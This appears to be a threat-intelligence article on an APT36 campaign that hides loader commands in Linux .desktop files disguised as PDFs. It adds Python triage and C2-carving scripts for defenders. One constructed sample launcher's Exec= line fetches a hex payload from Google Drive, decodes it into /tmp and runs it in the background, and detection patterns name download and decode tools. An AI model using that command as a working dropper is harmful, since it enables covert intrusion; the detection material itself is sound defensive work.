The Pakistan-linked threat group APT36—also known as Transparent Tribe, Mythic Leopard, Earth Karkaddan, or Operation C-Major—has re-emerged with a new malware delivery technique targeting Indian defense and government entities. According to researchers at CloudSEK, the group is evolving its tactics by leveraging Linux .desktop files and Google Drive-hosted payloads to bypass defenses and achieve persistence.
As the report highlights, “APT36 is well known for its persistent phishing campaigns and credential-harvesting operations used to gain access to sensitive environments.”
The campaign begins with phishing emails carrying ZIP archives that contain malicious .desktop files disguised as PDF documents. For instance, a file named PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop looks like a routine procurement document, but its Exec= entry, the command line a desktop environment runs when the launcher is opened, carries the malicious command.
CloudSEK explains: “When executed, the loader downloads a dropper payload from Google Drive, stored there as hex-encoded strings.”

The infection chain includes:
- Fetching the hex-encoded payload from Google Drive and decoding it into a binary in the /tmp directory.
- Assigning execute permissions and running the binary in the background.
- Opening a decoy PDF in Firefox to distract the victim while the malware silently operates.
Once executed, the dropper performs multiple stealth operations:
- Anti-analysis checks – running loops to evade sandboxes and debugging tools.
- Persistence – adding itself to autostart or cron jobs to ensure survival after reboots.
- Fake appearances – disguising itself as a legitimate PDF shortcut with embedded Base64 icons.
The trick is that the attack command sits in the Exec= key of an ordinary .desktop launcher, a file that users and many security tools treat as harmless desktop configuration rather than as an executable; it is a technique rarely seen in Linux-targeted espionage.
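A triage script for the lure pattern described in the chain above, written for this article as an added example (it is not CloudSEK's tooling). The sample launcher is constructed: its Exec= command is an assumption modelled on the described steps (fetch hex-encoded data from Google Drive, decode into /tmp, chmod +x, run in the background, open a decoy in Firefox) and is not the real lure's contents; the Google Drive id EXAMPLE and the Base64 icon are placeholders. The script parses the file as the INI-style format it is and flags each link of the chain separately, so a legitimate launcher that merely opens a viewer is not reported.

```python
"""Triage a .desktop file for the lure pattern described above (added example)."""
import re
from configparser import ConfigParser

# Constructed sample: the Exec= line is an assumption modelled on the described
# chain, not the actual lure's contents. Icon= holds placeholder Base64.
SAMPLE_NAME = "PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop"
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf
Terminal=false
Icon=iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAB3RJTUUH5QQEBw
Exec=bash -c "curl -sL 'https://drive.google.com/uc?export=download&id=EXAMPLE' -o /tmp/x.hex; xxd -r -p /tmp/x.hex > /tmp/x; chmod +x /tmp/x; nohup /tmp/x >/dev/null 2>&1 & firefox /tmp/decoy.pdf"
"""

# A normal launcher for comparison (also constructed).
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Firefox Web Browser
Icon=firefox
Exec=firefox %u
"""

DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")

# One pattern per link of the described chain, matched against the Exec= value.
EXEC_PATTERNS = [
    ("shell-wrapper", r"\b(sh|bash|dash|zsh)\b\s+-c\b"),
    ("remote-fetch", r"\b(curl|wget)\b|drive\.google\.com"),
    ("decode-step", r"xxd\s+-r|base64\s+(-d|--decode)|fromhex|unhex"),
    ("drop-to-tmp", r"(?:>|-o|-O)\s*['\"]?/(?:tmp|dev/shm|var/tmp)/"),
    ("chmod-exec", r"chmod\s+(\+x|[0-7]{3,4})"),
    ("background-run", r"\bnohup\b|\bsetsid\b|\s&\s|\s&$"),
    ("decoy-viewer", r"\b(firefox|xdg-open|evince|okular|libreoffice)\b"),
]


def double_extension(filename):
    """True for names like report.pdf.desktop that masquerade as documents."""
    name = filename.lower()
    if not name.endswith(".desktop"):
        return False
    return name[: -len(".desktop")].endswith(DOC_EXTS)


def triage_desktop(filename, text):
    """Return {'findings': [...], 'verdict': 'suspicious'|'benign'} for one launcher."""
    # interpolation=None: legitimate Exec= values carry %u/%f field codes.
    cp = ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case so 'Exec' is looked up as written
    cp.read_string(text)
    entry = cp["Desktop Entry"] if cp.has_section("Desktop Entry") else {}
    exec_value = entry.get("Exec", "")
    icon = entry.get("Icon", "")

    findings = []
    if double_extension(filename):
        findings.append("double-extension")
    # Icon= normally names a theme icon or a path; a long Base64 run is data.
    if re.fullmatch(r"[A-Za-z0-9+/=]{40,}", icon):
        findings.append("embedded-icon")
    chain = [tag for tag, pat in EXEC_PATTERNS if re.search(pat, exec_value)]
    findings.extend(chain)

    # A viewer alone is what a real launcher looks like; a shell wrapper
    # combined with three or more chain links is not.
    verdict = "suspicious" if "shell-wrapper" in chain and len(chain) >= 3 else "benign"
    return {"findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for name, text in ((SAMPLE_NAME, SAMPLE_DESKTOP), ("firefox.desktop", BENIGN_DESKTOP)):
        print(name, triage_desktop(name, text))
```

Run it over every .desktop extracted from a suspicious archive (or from ~/.config/autostart and ~/Desktop during an investigation); the per-link tags tell an analyst which stage of the chain the launcher implements, which is more useful than a single score when a variant drops one of the steps.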
The final payload, a Go-based ELF binary, establishes a C2 connection using WebSockets. Researchers found it continually beaconing to:
- C2 Domain: seemysitelive[.]store
- C2 IP: 164.215.103.55 (ASN: AS213373, IP Connect Inc)
CloudSEK’s analysis revealed: “The loop at the end is critical: that Base64 blob decodes to a WebSocket URL (ws://seemysitelive[.]store:8080/ws). The client continually tries to connect to it.”
WebSockets themselves are a standard protocol; what stands out here is a plaintext ws:// connection on port 8080 rather than TLS on 443, which starts as an ordinary HTTP Upgrade handshake and then stays open as a long-lived session. That lets APT36 keep control of infected hosts while blending into web traffic, although the absence of TLS also means a network sensor can inspect both the handshake and the frames.
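The analysis quoted above recovers the C2 endpoint by decoding a Base64 blob found in the binary. The following is an added example of that step, not CloudSEK's code: it scans a byte buffer for Base64-looking runs, decodes each one, and keeps those that decode to a ws:// or wss:// URL, then resolves the host and port the client would connect to. SAMPLE_BLOB is a constructed stand-in for the ELF's string data, and the hostname c2.example.invalid is a placeholder rather than the campaign's real domain.

```python
"""Carve Base64-encoded WebSocket C2 URLs out of a binary's bytes (added example)."""
import base64
import binascii
import re
from urllib.parse import urlsplit

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
WS_URL = re.compile(rb"wss?://[A-Za-z0-9.-]+(?::\d{1,5})?(?:/[^\s\"'\x00]*)?")

# Constructed stand-in for the ELF's string table: Go-style symbols and junk
# around one encoded URL. The host is a placeholder, not the real C2 domain.
_ENCODED_C2 = base64.b64encode(b"ws://c2.example.invalid:8080/ws")
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"main.connect\x00"
    + _ENCODED_C2 + b"\x00"
    + b"golang.org/x/net/websocket\x00"
    + base64.b64encode(b"not a url, just filler bytes") + b"\x00"
)


def carve_ws_urls(blob):
    """Return [(offset, url), ...] for every Base64 run that decodes to a ws(s):// URL."""
    hits = []
    for m in B64_RUN.finditer(blob):
        run = m.group(0)
        # Runs cut short by a non-Base64 byte may lack padding; top it up.
        padded = run + b"=" * (-len(run) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True)
        except binascii.Error:
            continue  # not decodable (e.g. a long identifier that happens to match)
        for u in WS_URL.finditer(decoded):
            hits.append((m.start(), u.group(0).decode("ascii")))
    return hits


def ws_endpoint(url):
    """(host, port) for a ws:// or wss:// URL, applying the scheme's default port."""
    parts = urlsplit(url)
    default = 443 if parts.scheme == "wss" else 80
    return parts.hostname, parts.port or default


if __name__ == "__main__":
    for off, url in carve_ws_urls(SAMPLE_BLOB):
        print(f"offset {off:#x}: {url} -> {ws_endpoint(url)}")
```

Point carve_ws_urls at the bytes of a captured ELF (or at the output of strings) and it yields the decoded endpoints with their file offsets, which is enough to seed a network block and to pivot to the offset in a disassembler; ws_endpoint gives the host:port pair to look for in proxy or NetFlow data.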
APT36 has been active since at least 2013, with a long history of targeting Indian government, defense personnel, and strategic organizations. The use of Google Drive to deliver malicious payloads marks an evolution in their capabilities, blending trusted cloud services into their attack lifecycle.
The report warns: “The use of Google Drive in their attack lifecycle represents a significant evolution in the threat group’s capabilities, introducing spearphishing vectors that pose higher risks to Linux-based government and defense infrastructure.”
The new APT36 campaign demonstrates a clear tactical shift toward targeting Linux environments with disguised .desktop files, cloud-based payload delivery, and evasive WebSocket C2 infrastructure.
As CloudSEK concludes, “APT36 attacks focus on government and defense personnel, risking leakage of sensitive defense and strategic information that can compromise national security and organizational confidentiality.”
For defenders, this underscores the need for phishing awareness, scrutiny of .desktop files arriving in archives (double extensions such as .pdf.desktop, and Exec= entries that invoke a shell, call download tools or decoders, or write to /tmp), and monitoring of outbound WebSocket connections, particularly plaintext ws:// sessions to uncommon ports such as 8080, to identify stealthy APT activity.